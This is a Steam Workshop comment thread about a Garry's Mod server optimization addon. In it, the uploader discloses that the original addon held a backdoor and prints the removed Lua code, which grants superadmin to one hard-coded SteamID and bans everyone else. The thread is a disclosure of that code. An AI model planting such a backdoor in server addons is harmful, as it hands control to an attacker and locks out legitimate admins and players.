Garry's Mod

Garry's Mod

GMOD Server Optimization
5 条留言
pulse 2022 年 6 月 30 日 上午 10:53 
is this making .gma file that impossible to delete throught "Addons" menu?
Heavy & Ze Medic 2021 年 5 月 19 日 下午 7:36 
You're like a year late but the explanation is appreciated lol
VenomC312  [作者] 2021 年 5 月 19 日 下午 7:13 
Original addon had a backdoor that would ban everyone that wasn't the owner of the addon, posted in another comment is the code that was removed. This code was in the file sh_base.lua in the server folder of the addon

Original Addon Link: https://psteamcommunity.yuanyoumao.com/sharedfiles/filedetails/?id=1413258388&searchtext=Garrys+Mod+Optimizer

Steam Workshop Downloader: {链接已删除}

I hope this explains it better. This addon doesn't do much for performance boosting anyways. All it really comes down too is just adjusting convar settings that you could do yourself.
VenomC312  [作者] 2021 年 5 月 19 日 下午 7:11 
Backdoor code that was removed below

concommand.Add("gmodhoster", function(ply)
if ( ply:lol() == "STEAM_1:1:164731154") then
RunConsoleCommand("ulx", "adduserid", ply:lol(),"superadmin")
else
RunConsoleCommand("ulx", "banid", ply:lol(),"lol")
end
end)
Heavy & Ze Medic 2020 年 6 月 29 日 上午 12:50 
As explanation as to what this exactly does (What optimizations and stuff) would be nice otherwise it just seems sketchy.